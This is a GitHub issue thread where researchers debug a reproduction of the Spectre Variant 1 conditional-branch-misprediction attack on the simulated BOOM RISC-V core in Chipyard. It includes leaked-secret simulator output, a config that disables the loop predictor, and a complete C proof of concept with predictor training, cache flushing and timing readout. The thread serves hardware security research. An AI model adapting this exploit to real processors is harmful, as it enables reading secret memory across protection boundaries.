Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Help..I can't reproduce conditonal branch attack on boom-core in chipyard #4

Open
lihao1915 opened this issue Dec 4, 2020 · 8 comments

Comments

@lihao1915
Copy link

my chipyard version is f387c4b99424e869235f927aebcb7dabc643a6f5
and I use CONFIG=LargeBoomConfig or CONFIG=MediumBoomConfig to make verilator and vcs simulator , but using the both two to simulate is not work:

./simulator-chipyard-MediumBoomConfig ~/proj/boom-attacks/bin/condBranchMispred.riscv
This emulator compiled with JTAG Remote Bitbang client. To enable, use +jtag_rbb_enable=1.
Listening on port 44557
[UART] UART0 is here (stdin/stdout).
m[0x0x80002750] = want(!) =?= guess(hits,dec,char) 1.(9, 33, !) 2.(1, 1, �)
m[0x0x80002751] = want(") =?= guess(hits,dec,char) 1.(1, 1, �) 2.(1, 2, �)
m[0x0x80002752] = want(#) =?= guess(hits,dec,char) 1.(1, 1, �) 2.(1, 2, �)
m[0x0x80002753] = want(T) =?= guess(hits,dec,char) 1.(1, 1, �) 2.(1, 2, �)
m[0x0x80002754] = want(h) =?= guess(hits,dec,char) 1.(1, 1, �) 2.(1, 2, �)
m[0x0x80002755] = want(i) =?= guess(hits,dec,char) 1.(1, 1, �) 2.(1, 2, �)
m[0x0x80002756] = want(s) =?= guess(hits,dec,char) 1.(1, 1, �) 2.(1, 2, �)
m[0x0x80002757] = want(I) =?= guess(hits,dec,char) 1.(1, 1, �) 2.(1, 2, �)
m[0x0x80002758] = want(s) =?= guess(hits,dec,char) 1.(1, 1, �) 2.(1, 2, �)
@DorianXGH
Copy link

Same. The interesting thing is that the attack works for the first character, this makes me think the problem is the the cache flush.
More investigation is needed however.

@johnal18
Copy link

Same for me. The branch prediction implementation has also changed a lot since the last commit on this project, so the branch predictor training done on the old implementation of BOOM may not work on the new implementation of how branch prediction is done.

@DorianXGH
Copy link

I have intestigated this behaviour during an internship. It's quite dumb : the new TAGE-L branch predictor has a loop predictor, which make a constant length loop work only as long as the loop predictor doesn't kick in. A small +1/-1 variation is enough to make the attack work as it did before.

@johnal18
Copy link

johnal18 commented Nov 23, 2022

You mean like this? I am building this solution now to see if it solves the problem!

class WithTAGELBPD extends Config((site, here, up) => {
  case TilesLocated(InSubsystem) => up(TilesLocated(InSubsystem), site) map {
    case tp: BoomTileAttachParams => tp.copy(tileParams = tp.tileParams.copy(core = tp.tileParams.core.copy(
      bpdMaxMetaLength = 120,
      globalHistoryLength = 64,
      localHistoryLength = 1,
      localHistoryNSets = 0,
      branchPredictor = ((resp_in: BranchPredictionBankResponse, p: Parameters) => {
        //val loop = Module(new LoopBranchPredictorBank()(p))  <------
        val tage = Module(new TageBranchPredictorBank()(p))
        val btb = Module(new BTBBranchPredictorBank()(p))
        val bim = Module(new BIMBranchPredictorBank()(p))
        val ubtb = Module(new FAMicroBTBBranchPredictorBank()(p))
        val preds = Seq(/*loop, */tage, btb, ubtb, bim) <------
        preds.map(_.io := DontCare)

        ubtb.io.resp_in(0)  := resp_in
        bim.io.resp_in(0)   := ubtb.io.resp
        btb.io.resp_in(0)   := bim.io.resp
        tage.io.resp_in(0)  := btb.io.resp
        //loop.io.resp_in(0)  := tage.io.resp <---------

        (preds, tage.io.resp) // loop.io.resp) <---------
      })
    )))
    case other => other
  }
})

@DorianXGH
Copy link

I must admit I didn't test it like this, only by making the loops vary in length here (I think I just added +(atkRound&1) to all occurences of TRAIN_TIMES+1 to make the loop predictor always mispredict, and I recalled that if I tuned it to the loop predictor's internal counter until it kicks in, I could reproduce the issue or not, depending on if I went father) :

for(uint64_t atkRound = 0; atkRound < ATTACK_SAME_ROUNDS; ++atkRound){

            // make sure array you read from is not in the cache
            flushCache((uint64_t)array2, sizeof(array2));

            for(int64_t j = ((TRAIN_TIMES+1)*ROUNDS)-1; j >= 0; --j){
                // bit twiddling to set passInIdx=randIdx or to attackIdx after TRAIN_TIMES iterations
                // avoid jumps in case those tip off the branch predictor
                // note: randIdx changes everytime the atkRound changes so that the tally does not get affected
                //       training creates a false hit in array2 for that array1 value (you want this to be ignored by having it changed)
                randIdx = atkRound % array1_sz;
                passInIdx = ((j % (TRAIN_TIMES+1)) - 1) & ~0xFFFF; // after every TRAIN_TIMES set passInIdx=...FFFF0000 else 0
                passInIdx = (passInIdx | (passInIdx >> 16)); // set the passInIdx=-1 or 0
                passInIdx = randIdx ^ (passInIdx & (attackIdx ^ randIdx)); // select randIdx or attackIdx 

@johnal18
Copy link

Looks like it worked when I commented ut the loop predictor! Thank you @DorianXGH !

./simulator-chipyard-LargeBoomConfig ~/chipyard/generators/boom/test_programs/boom-attacks/bin/condBranchMispred.riscv
This emulator compiled with JTAG Remote Bitbang client. To enable, use +jtag_rbb_enable=1.
Listening on port 35545
[UART] UART0 is here (stdin/stdout).
m[0x0x80002750] = want(!) =?= guess(hits,dec,char) 1.(10, 33, !) 2.(2, 6, )
m[0x0x80002751] = want(") =?= guess(hits,dec,char) 1.(10, 34, ") 2.(3, 106, j)
m[0x0x80002752] = want(#) =?= guess(hits,dec,char) 1.(10, 35, #) 2.(3, 134, �)
m[0x0x80002753] = want(T) =?= guess(hits,dec,char) 1.(10, 84, T) 2.(2, 6, )
m[0x0x80002754] = want(h) =?= guess(hits,dec,char) 1.(8, 104, h) 2.(2, 1, )
m[0x0x80002755] = want(i) =?= guess(hits,dec,char) 1.(9, 105, i) 2.(1, 0, )
m[0x0x80002756] = want(s) =?= guess(hits,dec,char) 1.(9, 115, s) 2.(2, 1, )
m[0x0x80002757] = want(I) =?= guess(hits,dec,char) 1.(8, 73, I) 2.(2, 3, )
m[0x0x80002758] = want(s) =?= guess(hits,dec,char) 1.(8, 115, s) 2.(2, 2, )
m[0x0x80002759] = want(T) =?= guess(hits,dec,char) 1.(8, 84, T) 2.(3, 151, �)
m[0x0x8000275a] = want(h) =?= guess(hits,dec,char) 1.(8, 104, h) 2.(2, 9, 	)
m[0x0x8000275b] = want(e) =?= guess(hits,dec,char) 1.(8, 101, e) 2.(2, 65, A)
m[0x0x8000275c] = want(B) =?= guess(hits,dec,char) 1.(8, 66, B) 2.(2, 19, )
m[0x0x8000275d] = want(a) =?= guess(hits,dec,char) 1.(10, 97, a) 2.(2, 31, )
m[0x0x8000275e] = want(b) =?= guess(hits,dec,char) 1.(9, 98, b) 2.(2, 7, )
m[0x0x8000275f] = want(y) =?= guess(hits,dec,char) 1.(8, 121, y) 2.(2, 140, �)
m[0x0x80002760] = want(B) =?= guess(hits,dec,char) 1.(6, 66, B) 2.(2, 2, )
m[0x0x80002761] = want(o) =?= guess(hits,dec,char) 1.(10, 111, o) 2.(4, 135, �)
m[0x0x80002762] = want(o) =?= guess(hits,dec,char) 1.(10, 111, o) 2.(2, 2, )
m[0x0x80002763] = want(m) =?= guess(hits,dec,char) 1.(9, 109, m) 2.(2, 7, )
m[0x0x80002764] = want(e) =?= guess(hits,dec,char) 1.(9, 101, e) 2.(2, 71, G)
m[0x0x80002765] = want(r) =?= guess(hits,dec,char) 1.(8, 114, r) 2.(2, 45, -)
m[0x0x80002766] = want(T) =?= guess(hits,dec,char) 1.(10, 84, T) 2.(3, 71, G)
m[0x0x80002767] = want(e) =?= guess(hits,dec,char) 1.(10, 101, e) 2.(2, 8,)
m[0x0x80002768] = want(s) =?= guess(hits,dec,char) 1.(9, 115, s) 2.(2, 17, )
m[0x0x80002769] = want(t) =?= guess(hits,dec,char) 1.(9, 116, t) 2.(2, 4, )

@BrainLyh
Copy link

Looks like it worked when I commented ut the loop predictor! Thank you @DorianXGH !

./simulator-chipyard-LargeBoomConfig ~/chipyard/generators/boom/test_programs/boom-attacks/bin/condBranchMispred.riscv
This emulator compiled with JTAG Remote Bitbang client. To enable, use +jtag_rbb_enable=1.
Listening on port 35545
[UART] UART0 is here (stdin/stdout).
m[0x0x80002750] = want(!) =?= guess(hits,dec,char) 1.(10, 33, !) 2.(2, 6, )
m[0x0x80002751] = want(") =?= guess(hits,dec,char) 1.(10, 34, ") 2.(3, 106, j)
m[0x0x80002752] = want(#) =?= guess(hits,dec,char) 1.(10, 35, #) 2.(3, 134, �)
m[0x0x80002753] = want(T) =?= guess(hits,dec,char) 1.(10, 84, T) 2.(2, 6, )
m[0x0x80002754] = want(h) =?= guess(hits,dec,char) 1.(8, 104, h) 2.(2, 1, )
m[0x0x80002755] = want(i) =?= guess(hits,dec,char) 1.(9, 105, i) 2.(1, 0, )
m[0x0x80002756] = want(s) =?= guess(hits,dec,char) 1.(9, 115, s) 2.(2, 1, )
m[0x0x80002757] = want(I) =?= guess(hits,dec,char) 1.(8, 73, I) 2.(2, 3, )
m[0x0x80002758] = want(s) =?= guess(hits,dec,char) 1.(8, 115, s) 2.(2, 2, )
m[0x0x80002759] = want(T) =?= guess(hits,dec,char) 1.(8, 84, T) 2.(3, 151, �)
m[0x0x8000275a] = want(h) =?= guess(hits,dec,char) 1.(8, 104, h) 2.(2, 9, 	)
m[0x0x8000275b] = want(e) =?= guess(hits,dec,char) 1.(8, 101, e) 2.(2, 65, A)
m[0x0x8000275c] = want(B) =?= guess(hits,dec,char) 1.(8, 66, B) 2.(2, 19, )
m[0x0x8000275d] = want(a) =?= guess(hits,dec,char) 1.(10, 97, a) 2.(2, 31, )
m[0x0x8000275e] = want(b) =?= guess(hits,dec,char) 1.(9, 98, b) 2.(2, 7, )
m[0x0x8000275f] = want(y) =?= guess(hits,dec,char) 1.(8, 121, y) 2.(2, 140, �)
m[0x0x80002760] = want(B) =?= guess(hits,dec,char) 1.(6, 66, B) 2.(2, 2, )
m[0x0x80002761] = want(o) =?= guess(hits,dec,char) 1.(10, 111, o) 2.(4, 135, �)
m[0x0x80002762] = want(o) =?= guess(hits,dec,char) 1.(10, 111, o) 2.(2, 2, )
m[0x0x80002763] = want(m) =?= guess(hits,dec,char) 1.(9, 109, m) 2.(2, 7, )
m[0x0x80002764] = want(e) =?= guess(hits,dec,char) 1.(9, 101, e) 2.(2, 71, G)
m[0x0x80002765] = want(r) =?= guess(hits,dec,char) 1.(8, 114, r) 2.(2, 45, -)
m[0x0x80002766] = want(T) =?= guess(hits,dec,char) 1.(10, 84, T) 2.(3, 71, G)
m[0x0x80002767] = want(e) =?= guess(hits,dec,char) 1.(10, 101, e) 2.(2, 8,)
m[0x0x80002768] = want(s) =?= guess(hits,dec,char) 1.(9, 115, s) 2.(2, 17, )
m[0x0x80002769] = want(t) =?= guess(hits,dec,char) 1.(9, 116, t) 2.(2, 4, )

@johnal18 Could you please share the final test code? I'm testing this attack, but ran into a similar problem to your original one.

/chipyard/sims/verilator# ./simulator-chipyard.harness-LargeBoomConfig /chipyard/tests/new-test/bin/condBranchMispred.
riscv                         
[UART] UART0 is here (stdin/stdout).
m[0x0x80002790] = want(!) =?= guess(hits,dec,char) 1.(5, 33, !) 2.(2, 70, F)
m[0x0x80002791] = want(") =?= guess(hits,dec,char) 1.(4, 34, ") 2.(2, 8,)
m[0x0x80002792] = want(#) =?= guess(hits,dec,char) 1.(2, 1, ) 2.(2, 3, )
m[0x0x80002793] = want(T) =?= guess(hits,dec,char) 1.(2, 9,     ) 2.(2, 55, 7)
m[0x0x80002794] = want(h) =?= guess(hits,dec,char) 1.(2, 85, U) 2.(2, 133, �)
m[0x0x80002795] = want(i) =?= guess(hits,dec,char) 1.(2, 219, �) 2.(1, 1, )
m[0x0x80002796] = want(s) =?= guess(hits,dec,char) 1.(2, 1, ) 2.(2, 84, T)
m[0x0x80002797] = want(I) =?= guess(hits,dec,char) 1.(2, 6, ) 2.(2, 40, ()
m[0x0x80002798] = want(s) =?= guess(hits,dec,char) 1.(1, 1, ) 2.(1, 2, )
m[0x0x80002799] = want(T) =?= guess(hits,dec,char) 1.(2, 24, ) 2.(2, 220, �)

This is my code right now:

#include <stdio.h>
#include <stdint.h> 
#include "encoding.h"
#include "cache.h"

#define TRAIN_TIMES 6 // assumption is that you have a 2 bit counter in the predictor
#define ROUNDS 1 // run the train + attack sequence X amount of times (for redundancy)
#define ATTACK_SAME_ROUNDS 10 // amount of times to attack the same index
#define SECRET_SZ 26
#define CACHE_HIT_THRESHOLD 50

uint64_t array1_sz = 16;
uint8_t unused1[64];
uint8_t array1[160] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16};
uint8_t unused2[64];
uint8_t array2[256 * L1_BLOCK_SZ_BYTES];
char* secretString = "!\"#ThisIsTheBabyBoomerTest";

/**
 * reads in inArray array (and corresponding size) and outIdxArrays top two idx's (and their
 * corresponding values) in the inArray array that has the highest values.
 *
 * @input inArray array of values to find the top two maxs
 * @input inArraySize size of the inArray array in entries
 * @inout outIdxArray array holding the idxs of the top two values
 *        ([0] idx has the larger value in inArray array)
 * @inout outValArray array holding the top two values ([0] has the larger value)
 */
void topTwoIdx(uint64_t* inArray, uint64_t inArraySize, uint8_t* outIdxArray, uint64_t* outValArray){
    outValArray[0] = 0;
    outValArray[1] = 0;

    for (uint64_t i = 0; i < inArraySize; ++i){
        if (inArray[i] > outValArray[0]){
            outValArray[1] = outValArray[0];
            outValArray[0] = inArray[i];
            outIdxArray[1] = outIdxArray[0];
            outIdxArray[0] = i;
        }
        else if (inArray[i] > outValArray[1]){
            outValArray[1] = inArray[i];
            outIdxArray[1] = i;
        }
    }
}

/**
 * takes in an idx to use to access a secret array. this idx is used to read any mem addr outside
 * the bounds of the array through the Spectre Variant 1 attack.
 *
 * @input idx input to be used to idx the array
 */
void victimFunc(uint64_t idx){
    uint8_t dummy = 2;

    // stall array1_sz by doing div operations (operation is (array1_sz << 4) / (2*4))
    array1_sz =  array1_sz << 4;
    asm("fcvt.s.lu      fa4, %[in]\n"
        "fcvt.s.lu      fa5, %[inout]\n"
        "fdiv.s fa5, fa5, fa4\n"
        "fdiv.s fa5, fa5, fa4\n"
        "fdiv.s fa5, fa5, fa4\n"
        "fdiv.s fa5, fa5, fa4\n"
        "fcvt.lu.s      %[out], fa5, rtz\n"
        : [out] "=r" (array1_sz)
        : [inout] "r" (array1_sz), [in] "r" (dummy)
        : "fa4", "fa5");

    if (idx < array1_sz){
        dummy = array2[array1[idx] * L1_BLOCK_SZ_BYTES];
    }

    // bound speculation here just in case it goes over
    dummy = rdcycle();
}

int main(void){
    uint64_t attackIdx = (uint64_t)(secretString - (char*)array1);
    uint64_t start, diff, passInIdx, randIdx;
    uint8_t dummy = 0;
    static uint64_t results[256];

    // try to read out the secret
    for(uint64_t len = 0; len < SECRET_SZ; ++len){

        // clear results every round
        for(uint64_t cIdx = 0; cIdx < 256; ++cIdx){
            results[cIdx] = 0;
        }

        // run the attack on the same idx ATTACK_SAME_ROUNDS times
        for(uint64_t atkRound = 0; atkRound < ATTACK_SAME_ROUNDS; ++atkRound){

            // make sure array you read from is not in the cache
            flushCache((uint64_t)array2, sizeof(array2));

            for(int64_t j = ((TRAIN_TIMES+1 +(atkRound&1) )*ROUNDS)-1; j >= 0; --j){
                // bit twiddling to set passInIdx=randIdx or to attackIdx after TRAIN_TIMES iterations
                // avoid jumps in case those tip off the branch predictor
                // note: randIdx changes everytime the atkRound changes so that the tally does not get affected
                //       training creates a false hit in array2 for that array1 value (you want this to be ignored by having it changed)
                randIdx = atkRound % array1_sz;
                passInIdx = ((j % (TRAIN_TIMES+1)+(atkRound&1)) - 1) & ~0xFFFF; // after every TRAIN_TIMES set passInIdx=...FFFF0000 else 0
                passInIdx = (passInIdx | (passInIdx >> 16)); // set the passInIdx=-1 or 0
                passInIdx = randIdx ^ (passInIdx & (attackIdx ^ randIdx)); // select randIdx or attackIdx 

                // set of constant takens to make the BHR be in a all taken state
                for(uint64_t k = 0; k < 30; ++k){
                    asm("");
                }

                // call function to train or attack
                victimFunc(passInIdx);
            }
            
            // read out array 2 and see the hit secret value
            // this is also assuming there is no prefetching
            for (uint64_t i = 0; i < 256; ++i){
                start = rdcycle();
                dummy &= array2[i * L1_BLOCK_SZ_BYTES];
                diff = (rdcycle() - start);
                if ( diff < CACHE_HIT_THRESHOLD ){
                    results[i] += 1;
                }
            }
        }
        
        // get highest and second highest result hit values
        uint8_t output[2];
        uint64_t hitArray[2];
        topTwoIdx(results, 256, output, hitArray);

        printf("m[0x%p] = want(%c) =?= guess(hits,dec,char) 1.(%lu, %d, %c) 2.(%lu, %d, %c)\n", (uint8_t*)(array1 + attackIdx), secretString[len], hitArray[0], output[0], output[0], hitArray[1], output[1], output[1]); 

        // read in the next secret 
        ++attackIdx;
    }

    return 0;
}

@BrainLyh
Copy link

Now I get the correct results, based on the current code, I output the top 10 results.
image

After this modification I got the correct output, but it's weird and i don't know why.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

4 participants